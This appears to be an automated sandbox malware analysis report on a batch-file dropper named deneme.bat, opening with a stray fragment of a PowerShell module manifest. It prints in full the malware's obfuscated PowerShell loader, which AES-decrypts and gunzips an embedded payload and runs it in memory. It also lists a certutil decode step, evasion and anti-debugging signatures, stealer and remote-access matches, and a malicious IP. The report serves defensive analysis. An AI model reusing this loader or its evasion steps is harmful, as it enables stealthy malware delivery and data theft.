Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques"
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: deneme.batStatic file information: File size 2277691 > 1048576
          Source: Binary string: powershell.pdbUGP source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: Binary string: powershell.pdb source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11FA92 pushad ; ret
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC122BAA push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC122C83 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1E5334 push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AE1A1 push edx; iretd
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5A7149 push eax; ret
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\allah.bat.exe

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile opened: C:\Users\user\AppData\Local\Temp\allah.bat.exe:Zone.Identifier read attributes | delete
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe TID: 3320Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeWindow / User API: threadDelayed 9093
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeThread delayed: delay time: 922337203685477
          Source: deneme.batBinary or memory string: TnJOMEMzU29pQnNGcDI3KzNpbjJTQzU1T2xqSFBsOXFjazMvc21tWmtlZXJPRlFs
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: allah.bat.exe, 00000004.00000002.684807459.0000020E69C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: deneme.batBinary or memory string: c0xsTHFKTGhqemU5NWhvb1ZYMXlKdXBxZDllWXdCcmNqNmp3T2J1dlVSZzhjZzIv
          Source: deneme.batBinary or memory string: TXorajdZTlRaeWpSNURaeTRBZTlCRXg1ZjM4RkRPN0hrQkxjQTk1YVRkVmNETkxZ

          Anti Debugging

          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11AA8A CheckRemoteDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lilxn = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\allah.bat').split([environment]::newline);foreach ($vohpq in $lilxn) { if ($vohpq.startswith(':: ')) { $ohwzk = $vohpq.substring(3); break; }; };$pphgd = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($ohwzk);$ygmef = new-object system.security.cryptography.aesmanaged;$ygmef.mode = [system.security.cryptography.ciphermode]::cbc;$ygmef.padding = [system.security.cryptography.paddingmode]::pkcs7;$ygmef.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('6pnvywetf4chawo/pebnarz3xrlewmbpf3oumgmdvww=');$ygmef.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('lxqslbfdvl0gyevxt5ivjg==');$blbua = $ygmef.createdecryptor();$pphgd = $blbua.transformfinalblock($pphgd, 0, $pphgd.length);$blbua.dispose();$ygmef.dispose();$mkymi = new-object system.io.memorystream(, $pphgd);$wtlbu = new-object system.io.memorystream;$jexhz = new-object system.io.compression.gzipstream($mkymi, [io.compression.compressionmode]::decompress);$jexhz.copyto($wtlbu);$jexhz.dispose();$mkymi.dispose();$wtlbu.dispose();$pphgd = $wtlbu.toarray();$wewpp = [system.reflection.assembly]::('daol'[-1..-4] -join '')($pphgd);$bdlvj = $wewpp.entrypoint;$bdlvj.invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR
MITRE ATT&CK Matrix (a number in front of a technique is the count of matching signatures; an empty cell means no technique is listed for that tactic in that row)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 1 Scripting | Logon Script (Windows) | Logon Script (Windows) | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 1 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Scripting | LSA Secrets | 22 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Hidden Files and Directories | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Obfuscated Files or Information | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Source | Detection | Scanner | Label | Link
deneme.bat | 8% | ReversingLabs | Text.Malware.Generic |
deneme.bat | 17% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\allah.bat | 100% | Avira | TR/Dldr.Malnote.U |
C:\Users\user\AppData\Local\Temp\allah.bat.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\allah.bat.exe | 0% | Virustotal | | Browse
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
74.234.104.236 | 0% | Avira URL Cloud | safe |
https://ipwho.is/ | 0% | Virustotal | | Browse
https://go.microsoft.cot | 0% | Avira URL Cloud | safe |
https://ipwho.is/ | 0% | Avira URL Cloud | safe |
          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
74.234.104.236 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.633628598.0000020E518B2000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | allah.bat.exe, 00000004.00000002.633628598.0000020E520F9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/11564914/23354; | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://contoso.com/allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exeallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licenseallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/Iconallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://ipwho.is/allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameallah.bat.exe, 00000004.00000002.633628598.0000020E50D01000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/Pester/Pesterallah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://go.microsoft.cotallah.bat.exe, 00000004.00000002.677997205.0000020E68E86000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
74.234.104.236 | unknown | United States | 7018 | ATT-INTERNET4US | true
                            Joe Sandbox Version:37.1.0 Beryl
                            Analysis ID:876996
                            Start date and time:2023-05-28 09:33:54 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:deneme.bat
                            Detection:MAL
                            Classification:mal100.troj.evad.winBAT@8/6@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .bat
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
• Not all processes were analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
09:34:54 | API Interceptor | 43x Sleep call for process: allah.bat.exe modified
No context
                            Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            File Type:data
                            Category:modified
                            Size (bytes):9432
                            Entropy (8bit):4.918232018284106
                            Encrypted:false
                            SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
                            MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
                            SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
                            SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
                            SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:1
                            Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\System32\certutil.exe
                            File Type:DOS batch file, ASCII text, with very long lines (59710), with CRLF line terminators
                            Category:dropped
                            Size (bytes):1656310
                            Entropy (8bit):6.015691015837739
                            Encrypted:false
                            SSDEEP:24576:2XSg2xeZeRalJecyKKAkS7Nr2C5Uz7yYmdAC8cywn+H8b/7KdxinkWrrMt:QSFQlC+92kKMh+yQRr
                            MD5:EAE03E33CC6A6DA5B23F9508133E453C
                            SHA1:1BEF2A1688C72A0A29B6CA6D378D57BB718DBBB7
                            SHA-256:5642778FEF03F7E81A81BB97A3C33D0B569479C65B556EB1CDAE50108BBC8A14
                            SHA-512:95A20A2A89D5910B0FABBCC0B96FCDFCC34BA226D076E17F65DBF7AED0C7FB1DBE7819FE1EEE3265ED1988F1075F614701B2195E65ABA9575D8E810DC29302D1
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Preview:@echo off..set "FVGr=set "..%FVGr%"diFAUFtRMb=st"..%FVGr%"HYrJXVYKMt=\v"..%FVGr%"yTBTwAtjPl=rs"..%FVGr%"JrIRTfruLx=ll"..%FVGr%"AcCxjzbNLa=e""..%FVGr%"uimqsJPnna=ws"..%FVGr%"fskjreOFIf=xe"..%FVGr%"BGqwyrxSRT=y "..%FVGr%"RQIVpdMYql=s\"..%FVGr%"JZYSrIliaK=\W"..%FVGr%"pKmrDtKJRu=ow"..%FVGr%"jokylzBZud=po"..%FVGr%"dteNOHluqU=ex"..%FVGr%"JNfEJZoVMF=em"..%FVGr%"LJuCjkXTHo=he"..%FVGr%"NiiSpBZPeO=we"..%FVGr%"wGRWikxUyZ="%~0."..%FVGr%"SOXgWNFsbQ=do"..%FVGr%"OfUcUhdoKk=Po"..%FVGr%"yirSNeGyTS=1."..%FVGr%"XpRSEUcRWD=we"..%FVGr%"MDGcYykQUG=co"..%FVGr%"dSgkpBIVWS=rS"..%FVGr%"blAcMgKKLZ=Sy"..%FVGr%"pFjqvtxWZA=Wi"..%FVGr%"NulBLqNrbK=.e"..%FVGr%"DfiQlRPLOE= /"..%FVGr%"CHdPeSYMSs=ll"..%FVGr%"JWoMEzizDC= C"..%FVGr%"dAMuPrdcZj=:\"..%FVGr%"KVlpBngVtN=in"..%FVGr%"xSIsYMTVlO=he"..%FVGr%"dpDmydkkFw=32"..%FVGr%"UwdGMUTIeF=py"..%FVGr%"QXQbIPoUxz=nd"..%FVGr%"bhFhUMkpqk=0\"..set "GpeR=set "..%GpeR%"tYMoAFPNXc=cd"..%GpeR%"XygUUDuQwo= "%~dp0""..set "AZSJ=set "..%AZSJ%"wObaReDTXA=GD);"..%AZSJ%"qWkGXtcWHU=Secu"..%AZSJ
                            Process:C:\Windows\System32\cmd.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):447488
                            Entropy (8bit):5.440627434620499
                            Encrypted:false
                            SSDEEP:6144:f1eapvqlkiMWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:NzW2KXzJ4pdd3klnnWosPhnzq
                            MD5:95000560239032BC68B4C2FDFCDEF913
                            SHA1:1B3B40FBC889FD4C645CC12C85D0805AC36BA254
                            SHA-256:D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
                            SHA-512:F990F72F4D90CE49F7A44DA0C0CDD82D56A7DC7461E073646ACFD448379B2ADEFD6E29FB2A596A9C8819DE53FA709905C98007B70DD4CF98569373013E42EE49
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
